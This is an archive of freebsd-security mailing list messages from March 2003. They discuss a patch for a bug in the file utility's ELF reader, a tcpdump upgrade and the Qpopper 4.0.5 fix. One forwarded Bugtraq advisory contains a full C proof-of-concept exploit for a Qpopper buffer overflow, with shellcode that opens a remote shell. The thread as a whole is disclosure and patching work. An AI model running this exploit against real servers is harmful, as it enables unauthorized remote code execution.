for ; Tue, 11 Mar 2003 10:24:26 -0800 (PST) Received: from pol.dyndns.org (pol.net1.nerim.net [80.65.225.93]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6E17743FCB for ; Tue, 11 Mar 2003 10:24:25 -0800 (PST) (envelope-from guy@device.dyndns.org) Received: from oemcomputer.device.dyndns.org (partserver.pol.local [172.16.10.10]) by pol.dyndns.org (8.12.6/8.12.6) with ESMTP id h2BIO7M4004610 for ; Tue, 11 Mar 2003 19:24:10 +0100 (CET) Message-Id: <5.1.1.6.0.20030311190645.02f316c8@device.dyndns.org> X-Sender: guy@device.dyndns.org X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 11 Mar 2003 19:24:03 +0100 To: From: "Guy P." Subject: Re: Prov. patch for the file hole ISS disclosed In-Reply-To: <20030311115215.1628a67b.nospam@hiltonbsd.com> References: <20030311174126.GA57179@madman.celabo.org> <200303061415.h26EFlhD004317@device.dyndns.org> <200303061415.h26EFlhD004317@device.dyndns.org> <5.2.0.9.2.20030311113159.0386fea0@localhost> <20030311174126.GA57179@madman.celabo.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 18:52 11/03/2003, Stephen Hilton wrote: >I am getting ready to do a buildworld today on 4.8-RC and can >test a patch if available. Does the patch provided by: > >Guy Poizat > >Appear correct ? After investigating what the file utility mainteners used in their fixed release, i'd suggest using the following patch instead, which looks more respectful regarding the original code to my eyes : --------------------------------------------------------------- --- src/contrib/file/readelf.c Sun Nov 26 22:37:21 2000 +++ src/contrib/file/readelf.c.patched Mon Mar 10 15:30:59 2003 @@ -104,6 +104,9 @@ #define shs_type (class == ELFCLASS32 \ ? getu32(swap, sh32.sh_type) \ : getu32(swap, sh64.sh_type)) +#define sh_size (class == ELFCLASS32 \ + ? sizeof sh32 \ + : sizeof sh64) #define ph_addr (class == ELFCLASS32 \ ? (void *) &ph32 \ : (void *) &ph64) @@ -141,11 +144,14 @@ Elf32_Shdr sh32; Elf64_Shdr sh64; + if (size != sh_size) + error("corrupted section header size.\n"); + if (lseek(fd, off, SEEK_SET) == -1) error("lseek failed (%s).\n", strerror(errno)); for ( ; num; num--) { - if (read(fd, sh_addr, size) == -1) + if (read(fd, sh_addr, sh_size) == -1) error("read failed (%s).\n", strerror(errno)); if (shs_type == SHT_SYMTAB /* || shs_type == SHT_DYNSYM */) { (void) printf (", not stripped"); --------------------------------------------------------------- Forgive my terrible english... -- Guy P. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 13:28:25 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E283137B401 for ; Tue, 11 Mar 2003 13:28:18 -0800 (PST) Received: from users.munk.nu (213-152-51-194.dsl.eclipse.net.uk [213.152.51.194]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8499643FAF for ; Tue, 11 Mar 2003 13:28:17 -0800 (PST) (envelope-from munk@users.munk.nu) Received: from users.munk.nu (munk@213-152-51-194.dsl.eclipse.net.uk [213.152.51.194]) by users.munk.nu (8.12.6/8.12.7) with ESMTP id h2BLSoML031329 for ; Tue, 11 Mar 2003 21:28:50 GMT (envelope-from munk@users.munk.nu) Received: (from munk@localhost) by users.munk.nu (8.12.6/8.12.6/Submit) id h2BLSnZP031328 for freebsd-security@freebsd.org; Tue, 11 Mar 2003 21:28:49 GMT Date: Tue, 11 Mar 2003 21:28:48 +0000 From: Jez Hancock To: FreeBSD Security List Subject: [heinz@cronon-ag.de: QPopper 4.0.x buffer overflow vulnerability] Message-ID: <20030311212848.GA29347@users.munk.nu> Mail-Followup-To: FreeBSD Security List Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="u3/rZRmxL6MmkK24" Content-Disposition: inline User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --u3/rZRmxL6MmkK24 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Hi, Can anyone confirm whether or not the attached vulnerability applies to the qpopper 4.0.4-1 port? TIA, Jez --u3/rZRmxL6MmkK24 Content-Type: message/rfc822 Content-Disposition: inline Received: from outgoing3.securityfocus.com (outgoing3.securityfocus.com [205.206.231.27]) by users.munk.nu (8.12.6/8.12.7) with ESMTP id h2BG0NML025347 for ; Tue, 11 Mar 2003 16:00:24 GMT (envelope-from bugtraq-return-8664-munk=munk.nu@securityfocus.com) Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19]) by outgoing3.securityfocus.com (Postfix) with QMQP id 4622FA30C5; Tue, 11 Mar 2003 08:45:45 -0700 (MST) Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm Precedence: bulk List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 13401 invoked from network); 10 Mar 2003 14:22:19 -0000 Date: Mon, 10 Mar 2003 15:31:34 +0100 From: Florian Heinz To: bugtraq@securityfocus.com Subject: QPopper 4.0.x buffer overflow vulnerability Message-ID: <20030310143133.GB1086@dereference.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.3i Hello, Under certain conditions it is possible to execute arbitrary code using a buffer overflow in the recent qpopper. You need a valid username/password-combination and code is (depending on the setup) usually executed with the user's uid and gid mail. Explanation: Qualcomm provides their own vsnprintf-implementation Qvsnprintf(). This function is used unconditionally on any system, regardless if the system has its own vsnprintf(). The function correctly writes up to 'n' bytes into the buffer, but fails to null-terminate it, if buffer-space runs out while copying the format-string (so the obvious fix is, null-terminate the buffer in Qvsnprintf()). This is a problem in pop_msg() (popper/pop_msg.c). The call to Qvsnprintf() can leave the buffer 'message' unterminated, so the successive call to strcat (strcat(message,"\r\n")) writes somewhere into thew stack. What it exactly overwrites depends heavily on the individual binary and the current stack-data (where is the next null-byte). I successfully managed to execute arbitrary code using the 'mdef'-command with the binary in the most recent debian-package 'qpopper-4.0.4-8' Sending 'mdef ()' with a macro-name of about 1000 bytes fills the buffer leaving it unterminated. The strcat overwrites the least significant byte of the saved basepointer on the stack, now pointing inside the buffer. On return of pop_mdef() (file pop_extend.c), the return-address is now fetched from within our buffer (and of course pointing inside our buffer), allowing to, for example, spawn a shell. The Macroname may not include bytes causing isspace() to return true and, of course, no null-byte, so shellcode must be appropriate crafted. I have tested the qpopper from SuSE 8.1 too, the flaw exists too, but SuSE is more lucky, strcat doesn't overwrite critical values. I have not yet tested other distributions. Here is a POC-exploit, Values for RETADDR and BUFSIZE adjusted for debian qpopper-4.0.4-8: -- snip -- #include #include #include #include #include #include #include #include char *sc = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x08\x40" "\x40\x40\xcd\x80"; #define BUFLEN 1006 #define RETLEN 148 #define RETADDR 0xbfffd304 int main (int argc, char **argv) { int fd, len, i, retaddr = RETADDR; char *bp, buf[2000]; struct sockaddr_in peer; fd_set fs; if (argc != 4) { fprintf(stderr, "Usage: %s \n\n", argv[0]); exit(EXIT_FAILURE); } peer.sin_family = AF_INET; peer.sin_port = htons(110); peer.sin_addr.s_addr = inet_addr(argv[1]); fd = socket(AF_INET, SOCK_STREAM, 0); if (connect(fd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) { perror("connect"); exit(EXIT_FAILURE); } snprintf(buf, 1024, "USER %s\n", argv[2]); write(fd, buf, strlen(buf)); snprintf(buf, 1024, "PASS %s\n", argv[3]); write(fd, buf, strlen(buf)); memset(buf, 0x90, 2000); memcpy(buf, "mdef ", 5); memcpy(buf + BUFLEN - RETLEN - strlen(sc), sc, strlen(sc)); bp = (char *) (((unsigned int)(buf + BUFLEN - RETLEN)) & 0xfffffffc); for (i = 0; i < RETLEN; i += 4) memcpy(bp+i+2, &retaddr, sizeof(int)); buf[BUFLEN-2] = '('; buf[BUFLEN-1] = ')'; buf[BUFLEN] = '\n'; write(fd, buf, BUFLEN+1); while (1) { FD_ZERO(&fs); FD_SET(0, &fs); FD_SET(fd, &fs); select(fd+1, &fs, NULL, NULL, NULL); if (FD_ISSET(0, &fs)) { if ((len = read(0, buf, 1000)) <= 0) break; write(fd, buf, len); } else { if ((len = read(fd, buf, 1000)) <= 0) break; write(1, buf, len); } } exit(EXIT_SUCCESS); } -- snap -- This is the short version. An enhanced version with error-checking, bufsize- and return-address autodetection can be found on http://nstx.dereference.de/snippets/qex.c Feedback is welcome. regards, Florian Heinz Cronon AG http://www.cronon.org PS: sorry for the bad english ;) --u3/rZRmxL6MmkK24-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 15:13:30 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B893137B419 for ; Tue, 11 Mar 2003 15:13:27 -0800 (PST) Received: from web10107.mail.yahoo.com (web10107.mail.yahoo.com [216.136.130.57]) by mx1.FreeBSD.org (Postfix) with SMTP id 0EB9943F3F for ; Tue, 11 Mar 2003 15:13:27 -0800 (PST) (envelope-from twigles@yahoo.com) Message-ID: <20030311231326.82217.qmail@web10107.mail.yahoo.com> Received: from [68.5.49.41] by web10107.mail.yahoo.com via HTTP; Tue, 11 Mar 2003 15:13:26 PST Date: Tue, 11 Mar 2003 15:13:26 -0800 (PST) From: twig les Subject: another TCPDump update question To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hey all, I'd really like to update tcpdump on my live boxes (since that is there primary function) and I'm thinking of simply installing the new version from source and linking it over the existing binary. I did this on a lab box and found no problems, however I may be missing something. The reason I can't do the "correct" thing and upgrade the base system is that these are live boxes in a remote facility (different state). The reason this ties into freebsd-security and not -questions is I'm still waiting for official word on a patch/upgrade procedure from the team. Am I being impatient here or did I miss something? I checked back over security-notifications and saw nothing. To illustrate what I did: L# find / -name tcpdump /usr/local/sbin/tcpdump /usr/local/tcpdump-3.7.2/tcpdump /usr/sbin/tcpdump ... L# rm /usr/sbin/tcpdump L# ln -s /usr/local/sbin/tcpdump /usr/sbin/tcpdump L# tcpdump -V tcpdump version 3.7.2 ===== ----------------------------------------------------------- Know yourself and know your enemy and you will never fear defeat. ----------------------------------------------------------- __________________________________________________ Do you Yahoo!? Yahoo! Web Hosting - establish your business online http://webhosting.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 16:18:40 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BA3E237B401 for ; Tue, 11 Mar 2003 16:18:37 -0800 (PST) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id C473543FBD for ; Tue, 11 Mar 2003 16:18:36 -0800 (PST) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id RAA19995; Tue, 11 Mar 2003 17:18:07 -0700 (MST) X-message-flag: Warning! Use of Microsoft Outlook renders your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20030311171659.03d45ba0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 11 Mar 2003 17:18:04 -0700 To: Jez Hancock , FreeBSD Security List From: Brett Glass Subject: Re: [heinz@cronon-ag.de: QPopper 4.0.x buffer overflow vulnerability] In-Reply-To: <20030311212848.GA29347@users.munk.nu> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 02:28 PM 3/11/2003, Jez Hancock wrote: >Hi, > >Can anyone confirm whether or not the attached vulnerability applies to >the qpopper 4.0.4-1 port? My guess is it does. The only mitigating factor is that the attacker has to supply a valid user ID and password, which means that the attack has to be an inside job. Any word regarding patches from Qualcomm? --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 19:12:52 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5A29B37B401 for ; Tue, 11 Mar 2003 19:12:49 -0800 (PST) Received: from lava.sentex.ca (pyroxene.sentex.ca [199.212.134.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2465843F85 for ; Tue, 11 Mar 2003 19:12:48 -0800 (PST) (envelope-from mike@sentex.net) Received: from simian.sentex.net (simeon.sentex.ca [192.168.43.27]) by lava.sentex.ca (8.12.8/8.12.8) with ESMTP id h2C3Ck8w036307 for ; Tue, 11 Mar 2003 22:12:46 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Tue, 11 Mar 2003 22:17:58 -0500 To: security@freebsd.org From: Mike Tancsa Subject: Fwd: Qpopper 4.0.5fc2 available Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (lava/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org FYI >X-Mailer: Eudora for Mac OS X v6.0a >Date: Tue, 11 Mar 2003 18:42:04 -0800 >List-Subscribe: >List-Unsubscribe: >List-Archive: >List-Post: >List-Owner: Pensive Mailing List Admin >List-Help: http://www.pensive.org/Mailing_Lists/ >List-Id: >List-Software: AutoShare 4.2.3 by Mikael Hansen >To: Qpopper Public List , > qpopper-announce@rohan.qualcomm.com >From: Randall Gellens >Subject: Qpopper 4.0.5fc2 available >X-Random-Sig-Tag: 1.0b25 >X-Spam-Status: No, hits=0.8 required=7.0 > tests=SPAM_PHRASE_00_01 > version=2.43 >X-Virus-Scanned: by Sentex Communications (avscan1/20021227) > >Qpopper 4.0.5fc2 is available at >. > >The full list of changes from one release to the next is on the FTP site, >at . > >Changes from 4.0.4b2 to 4.0.5fc2: >------------------------------ > 10. Fixed (non-root) buffer overflow. > >Please check this release out and let me know if you encounter any >problems. I plan on releasing 4.0.5 tomorrow afternoon if no problem >reports are received. >-- >Randall Gellens >Opinions are personal; facts are suspect; I speak for myself only >-------------- Randomly-selected tag: --------------- >Man is a rational animal who always loses his temper when he is >called upon to act in accordance with the dictates of reason. > --Oscar Wilde -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 20:32:22 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DBCFC37B401 for ; Tue, 11 Mar 2003 20:32:19 -0800 (PST) Received: from users.munk.nu (213-152-51-194.dsl.eclipse.net.uk [213.152.51.194]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8DAD943F85 for ; Tue, 11 Mar 2003 20:32:18 -0800 (PST) (envelope-from munk@users.munk.nu) Received: from users.munk.nu (munk@213-152-51-194.dsl.eclipse.net.uk [213.152.51.194]) by users.munk.nu (8.12.6/8.12.7) with ESMTP id h2C4WqML063480 for ; Wed, 12 Mar 2003 04:32:53 GMT (envelope-from munk@users.munk.nu) Received: (from munk@localhost) by users.munk.nu (8.12.6/8.12.6/Submit) id h2C4WpVf063479 for freebsd-security@FreeBSD.ORG; Wed, 12 Mar 2003 04:32:51 GMT Date: Wed, 12 Mar 2003 04:32:50 +0000 From: Jez Hancock To: FreeBSD Security List Subject: Re: [heinz@cronon-ag.de: QPopper 4.0.x buffer overflow vulnerability] Message-ID: <20030312043249.GA63091@users.munk.nu> Mail-Followup-To: FreeBSD Security List References: <20030311212848.GA29347@users.munk.nu> <4.3.2.7.2.20030311171659.03d45ba0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4.3.2.7.2.20030311171659.03d45ba0@localhost> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Mar 11, 2003 at 05:18:04PM -0700, Brett Glass wrote: > Any word regarding patches from Qualcomm? Looks like this question was answered by someone else on the list :) All good. Jez To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 22: 7:43 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5D1FD37B401 for ; Tue, 11 Mar 2003 22:07:41 -0800 (PST) Received: from intense.net (server.intense.net [199.217.236.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id 89F6A43FBD for ; Tue, 11 Mar 2003 22:07:40 -0800 (PST) (envelope-from bobber@intense.net) Received: (from root@localhost) by intense.net (8.12.8/8.12.3) id h2C68G6a095001 for freebsd-security@freebsd.org; Wed, 12 Mar 2003 00:08:16 -0600 (CST) (envelope-from bobber@intense.net) Received: from bob (209.248.134.245.nw.nuvox.net [209.248.134.245]) by intense.net (8.12.8/8.12.3av) with SMTP id h2C68DFr094991 for ; Wed, 12 Mar 2003 00:08:13 -0600 (CST) (envelope-from bobber@intense.net) Message-ID: <102a01c2e85d$6c195fc0$6c01a8c0@metropark.metropark.com> From: "Robert Herrold" To: References: <200303061415.h26EFlhD004317@device.dyndns.org> <200303061415.h26EFlhD004317@device.dyndns.org> <5.2.0.9.2.20030311113159.0386fea0@localhost> Subject: Re: Prov. patch for the file hole ISS disclosed Date: Wed, 12 Mar 2003 00:05:40 -0600 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4920.2300 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4920.2300 X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Did I get this in the middle of a thread???? This is very important to our operation (since we run Amavis), and even after viewing the archives, it appears that it is starting with this thread. Is there a a patch for this? It appears that the patch is relevant to GUI, and we dont' run Xwindows TIA Bob ----- Original Message ----- From: "Christopher Schulte" To: "Jacques A. Vidrine" ; "Guy Poizat" Cc: ; Sent: Tuesday, March 11, 2003 11:34 AM Subject: Re: Prov. patch for the file hole ISS disclosed > At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote: > >Thanks! However, this has already been fixed in -CURRENT (by import > >of FILE 3.41). I do not know whether or not David plans to MFC in > >time for 4.8-RELEASE. > > I think this should be merged into the security branches, > due to possible remote exploit by third party programs that > use file, such as (at the very least) amavis. > > >Cheers, > >-- > >Jacques A. Vidrine http://www.celabo.org/ > >NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos > >jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se > > -- > Christopher Schulte > http://www.schulte.org/ > Do not un-munge my @nospam.schulte.org > email address. This address is valid. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 12 11:38:59 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 98F6537B401 for ; Wed, 12 Mar 2003 11:38:55 -0800 (PST) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9BABD43FA3 for ; Wed, 12 Mar 2003 11:38:54 -0800 (PST) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA29343; Wed, 12 Mar 2003 12:38:44 -0700 (MST) X-message-flag: Warning! Use of Microsoft Outlook renders your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20030312123805.03d83a20@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 12 Mar 2003 12:38:41 -0700 To: Mike Tancsa , security@FreeBSD.ORG From: Brett Glass Subject: Re: Fwd: Qpopper 4.0.5fc2 available In-Reply-To: <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Has the port been patched? Since it's now the 12th, is the final version up yet? --Brett At 08:17 PM 3/11/2003, Mike Tancsa wrote: >FYI > > >>X-Mailer: Eudora for Mac OS X v6.0a >>Date: Tue, 11 Mar 2003 18:42:04 -0800 >>List-Subscribe: >>List-Unsubscribe: >>List-Archive: >>List-Post: >>List-Owner: Pensive Mailing List Admin >>List-Help: http://www.pensive.org/Mailing_Lists/ >>List-Id: >>List-Software: AutoShare 4.2.3 by Mikael Hansen >>To: Qpopper Public List , >> qpopper-announce@rohan.qualcomm.com >>From: Randall Gellens >>Subject: Qpopper 4.0.5fc2 available >>X-Random-Sig-Tag: 1.0b25 >>X-Spam-Status: No, hits=0.8 required=7.0 >> tests=SPAM_PHRASE_00_01 >> version=2.43 >>X-Virus-Scanned: by Sentex Communications (avscan1/20021227) >> >>Qpopper 4.0.5fc2 is available at . >> >>The full list of changes from one release to the next is on the FTP site, at . >> >>Changes from 4.0.4b2 to 4.0.5fc2: >>------------------------------ >> 10. Fixed (non-root) buffer overflow. >> >>Please check this release out and let me know if you encounter any problems. I plan on releasing 4.0.5 tomorrow afternoon if no problem reports are received. >>-- >>Randall Gellens >>Opinions are personal; facts are suspect; I speak for myself only >>-------------- Randomly-selected tag: --------------- >>Man is a rational animal who always loses his temper when he is >>called upon to act in accordance with the dictates of reason. >> --Oscar Wilde > >-------------------------------------------------------------------- >Mike Tancsa, tel +1 519 651 3400 >Sentex Communications, mike@sentex.net >Providing Internet since 1994 www.sentex.net >Cambridge, Ontario Canada www.sentex.net/mike > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 12 11:50:57 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 888C137B401 for ; Wed, 12 Mar 2003 11:50:52 -0800 (PST) Received: from lava.sentex.ca (pyroxene.sentex.ca [199.212.134.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id AB4D643FBD for ; Wed, 12 Mar 2003 11:50:51 -0800 (PST) (envelope-from mike@sentex.net) Received: from simian.sentex.net (simeon.sentex.ca [192.168.43.27]) by lava.sentex.ca (8.12.8/8.12.8) with ESMTP id h2CJon8w080431; Wed, 12 Mar 2003 14:50:49 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Wed, 12 Mar 2003 14:55:43 -0500 To: Brett Glass , security@FreeBSD.ORG From: Mike Tancsa Subject: Re: Fwd: Qpopper 4.0.5fc2 available In-Reply-To: <4.3.2.7.2.20030312123805.03d83a20@localhost> References: <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (lava/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I dont see the offical release yet, but I imagine the guy is on the west coast, so its not quite afternoon there. The only patch that does not apply cleanly in the port is the ipv6 patch. As I dont use that, I disabled it. If you want to get things going quickly, here is what I did checkpoint# diff -u qpopper/Makefile qpopper.new/Makefile --- qpopper/Makefile Sun Feb 23 14:58:21 2003 +++ qpopper.new/Makefile Wed Mar 12 11:15:08 2003 @@ -6,16 +6,17 @@ # PORTNAME= qpopper -PORTVERSION= 4.0.4 +PORTVERSION= 4.0.5fc2 PORTREVISION= 1 CATEGORIES= mail ipv6 MASTER_SITES= ftp://ftp.qualcomm.com/eudora/servers/unix/popper/%SUBDIR%/ MASTER_SITE_SUBDIR= . old DISTNAME= ${PORTNAME}${PORTVERSION} +WITHOUT_IPV6=Y .include -.if ${OSVERSION} >= 400014 && !defined(WITHOUT_IPV6) +.if ${OSVERSION} >= 900014 && !defined(WITHOUT_IPV6) PATCH_SITES= http://www.imasy.or.jp/~ume/ipv6/ PATCHFILES= qpopper4.0.4-ipv6-20020502.diff.gz PATCH_DIST_STRIP= -p1 @@ -32,7 +33,8 @@ CONFIGURE_ARGS= --enable-apop=${PREFIX}/etc/qpopper/pop.auth \ --enable-nonauth-file=${POPUSERS_FILE} \ --with-apopuid=pop --without-gdbm \ - --enable-keep-temp-drop + --enable-keep-temp-drop \ + --enable-shy --enable-servermode --enable-log-login PLIST_SUB= EPOPPASSD=${EPOPPASSD} \ POP_USER=${POP_USER} \ checkpoint# Note, the + --enable-keep-temp-drop \ + --enable-shy --enable-servermode --enable-log-login Are specific to my setup. And checkpoint# diff -u qpopper/distinfo qpopper.new/distinfo --- qpopper/distinfo Mon May 20 19:25:49 2002 +++ qpopper.new/distinfo Wed Mar 12 11:09:31 2003 @@ -1,2 +1,3 @@ MD5 (qpopper4.0.4.tar.gz) = 77f0968cd10b0d5236114838d9f507e5 +MD5 (qpopper4.0.5fc2.tar.gz) = fe1ea4d0e59104af37e513aba0fc7d6e MD5 (qpopper4.0.4-ipv6-20020502.diff.gz) = 62f6b065a040e3fbc31a720746b9efae checkpoint# I have been running this on a lesser used server and it seems to function correctly. ---Mike At 12:38 PM 12/03/2003 -0700, Brett Glass wrote: >Has the port been patched? Since it's now the 12th, is the final >version up yet? > >--Brett > > >At 08:17 PM 3/11/2003, Mike Tancsa wrote: > > > >FYI > > > > > >>X-Mailer: Eudora for Mac OS X v6.0a > >>Date: Tue, 11 Mar 2003 18:42:04 -0800 > >>List-Subscribe: > >>List-Unsubscribe: > > >>List-Archive: > >>List-Post: > >>List-Owner: Pensive Mailing List Admin > >>List-Help: http://www.pensive.org/Mailing_Lists/ > >>List-Id: > >>List-Software: AutoShare 4.2.3 by Mikael Hansen > >>To: Qpopper Public List , > >> qpopper-announce@rohan.qualcomm.com > >>From: Randall Gellens > >>Subject: Qpopper 4.0.5fc2 available > >>X-Random-Sig-Tag: 1.0b25 > >>X-Spam-Status: No, hits=0.8 required=7.0 > >> tests=SPAM_PHRASE_00_01 > >> version=2.43 > >>X-Virus-Scanned: by Sentex Communications (avscan1/20021227) > >> > >>Qpopper 4.0.5fc2 is available at > . > >> > >>The full list of changes from one release to the next is on the FTP > site, at . > >> > >>Changes from 4.0.4b2 to 4.0.5fc2: > >>------------------------------ > >> 10. Fixed (non-root) buffer overflow. > >> > >>Please check this release out and let me know if you encounter any > problems. I plan on releasing 4.0.5 tomorrow afternoon if no problem > reports are received. > >>-- > >>Randall Gellens > >>Opinions are personal; facts are suspect; I speak for myself only > >>-------------- Randomly-selected tag: --------------- > >>Man is a rational animal who always loses his temper when he is > >>called upon to act in accordance with the dictates of reason. > >> --Oscar Wilde > > > >-------------------------------------------------------------------- > >Mike Tancsa, tel +1 519 651 3400 > >Sentex Communications, mike@sentex.net > >Providing Internet since 1994 www.sentex.net > >Cambridge, Ontario Canada www.sentex.net/mike > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 12 12: 8:24 2003 Delivered-To: freebsd-security@freebsd.org Received: from 